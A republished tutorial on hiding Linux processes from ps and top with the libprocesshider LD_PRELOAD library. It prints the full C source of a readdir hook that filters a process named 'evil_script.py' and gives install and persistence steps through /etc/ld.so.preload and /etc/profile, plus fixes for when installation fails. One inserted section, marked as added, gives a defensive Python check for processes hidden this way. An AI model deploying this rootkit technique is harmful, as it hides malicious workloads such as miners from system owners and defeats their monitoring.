A method of hiding processes under Linux and the pitfalls encountered

Preface

1. The tools used in this article can be downloaded at https://github.com/gianlucaborello/libprocesshider

2. The idea is to use LD_PRELOAD to hijack system functions

What is LD_PRELOAD?

LD_PRELOAD is an environment variable honoured by the Linux dynamic linker (the runtime linker, ld.so). It names shared libraries that are loaded before all other libraries when a program starts. Its intended use is to selectively substitute functions: because symbols are resolved in load order, a function exported by a preloaded library takes precedence over the same-named function in the libraries the program was linked against, so a library that sits between the main program and its normal dependencies can override, for example, functions from the C library. On the one hand this lets us use our own (or better) implementations without needing anyone else's source code; on the other hand it lets us inject code into other people's programs for specific purposes, which is exactly what the method below relies on.

Implementation

1. Download the program and compile it

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2. Move the file to the /usr/local/lib/ directory

mv libprocesshider.so /usr/local/lib/

3. Register it with the dynamic linker so that it is preloaded into every process on the system

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

Testing

1. We run evil_script.py

2. evil_script.py now no longer appears in the output of top or ps.

The CPU is at 100%, yet no process can be seen that accounts for the load.

Analysis

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded from listings of /proc
 */
static const char* process_to_filter = "evil_script.py";

/*
 * Get a directory name given a DIR* handle, by resolving the
 * /proc/self/fd/<fd> symlink of its underlying file descriptor
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  /* readlink() does not NUL-terminate, so leave room for the terminator */
  ssize_t ret = readlink(tmp, buf, size - 1);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}

/*
 * Get a process name given its pid, from the "(comm)" field of /proc/<pid>/stat
 */
static int get_process_name(char* pid, char* buf)
{
  /* only all-numeric entries of /proc are process directories */
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if (fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  /* the line looks like "1234 (evil_script.py) S ..."; buf is 256 bytes in the caller */
  buf[0] = 0;
  sscanf(tmp, "%d (%255[^)]", &unused, buf);
  return 1;
}

/*
 * Define a replacement for readdir/readdir64 that resolves the real function
 * with dlsym(RTLD_NEXT, ...) on first use and skips the filtered /proc entry
 */
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
struct dirent* readdir(DIR *dirp) \
{ \
  if(original_##readdir == NULL) { \
    original_##readdir = dlsym(RTLD_NEXT, #readdir); \
    if(original_##readdir == NULL) \
    { \
      fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
    } \
  } \
  struct dirent* dir; \
  while(1) \
  { \
    dir = original_##readdir(dirp); \
    if(dir) { \
      char dir_name[256]; \
      char process_name[256]; \
      /* only filter when the directory being read is /proc itself */ \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
        strcmp(dir_name, "/proc") == 0 && \
        get_process_name(dir->d_name, process_name) && \
        strcmp(process_name, process_to_filter) == 0) { \
        continue; /* drop this entry and fetch the next one */ \
      } \
    } \
    break; \
  } \
  return dir; \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1. The variable process_to_filter holds the name of the process that should not be displayed.

2. readdir (and readdir64) are redefined. Each entry returned by the real readdir is checked: if the directory being read is /proc and the name recorded in /proc/<pid>/stat for that entry matches process_to_filter,

strcmp(process_name, process_to_filter) == 0

the entry is skipped (continue) and the next one is fetched, so tools such as ps and top that enumerate /proc never see it.
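A cross-check a defender can run against this kind of readdir hook, added here as an example and not part of the original article or of libprocesshider: it enumerates /proc the way ps does (through readdir) and again by stat()ing every candidate PID up to pid_max, reports the difference, and lists whatever /etc/ld.so.preload names. It assumes a standard Linux /proc layout; the constructed test inputs are the only other data it uses.

```python
import os

def comm_from_stat(stat_line):
    # Name is parenthesised and may itself contain ')', so split on the LAST ')'.
    start, end = stat_line.find("("), stat_line.rfind(")")
    if start == -1 or end < start:
        return None
    return stat_line[start + 1:end]

def listed_pids(proc="/proc"):
    # What ps/top see: os.listdir() calls libc readdir(), the hooked function.
    return {int(n) for n in os.listdir(proc) if n.isdigit()}

def probed_pids(pid_max, proc="/proc"):
    # stat() is a separate syscall a readdir() hook cannot filter, and the
    # hider leaves /proc/<pid> itself accessible, so probe every candidate.
    found = set()
    for pid in range(1, pid_max + 1):
        try:
            os.stat(os.path.join(proc, str(pid)))
            found.add(pid)
        except OSError:
            continue
    return found

def hidden_pids(listed, probed):
    # PIDs that exist on the filesystem but are absent from the listing.
    return sorted(probed - listed)

def parse_preload(text):
    # ld.so.preload entries are whitespace- or colon-separated; '#' starts a
    # comment. Any entry on a host that should preload nothing is a finding.
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(line.replace(":", " ").split())
    return entries

def main():
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as f:
            print("preload entries:", parse_preload(f.read()))
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = int(f.read())
    for pid in hidden_pids(listed_pids(), probed_pids(pid_max)):
        with open(f"/proc/{pid}/stat") as f:
            print("hidden pid", pid, "comm", comm_from_stat(f.read()))
if __name__ == "__main__":
    main()
```

A process that starts between the two enumerations shows up once as a false positive, so re-run before acting on a hit. A library that also hooks stat() or open() would escape this particular check, which is why the ld.so.preload contents are reported alongside the result.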

Pitfalls encountered

1. This program does not compile on some Linux systems

Workaround

Delete one of the last two lines:

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2. On some Linux systems

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

does not take effect. In that case the environment variable has to be set instead: edit the profile

bmfxgkpt-yhd:~# vi /etc/profile

and add the line

export LD_PRELOAD=/usr/local/lib/libprocesshider.so

Summary

The above is the editor's introduction to a method of hiding processes under Linux and the pitfalls encountered along the way. I hope it is helpful to everyone. If you have any questions, please leave a message and the editor will reply in time. Thanks also to everyone for supporting the 123WORDPRESS.COM website!
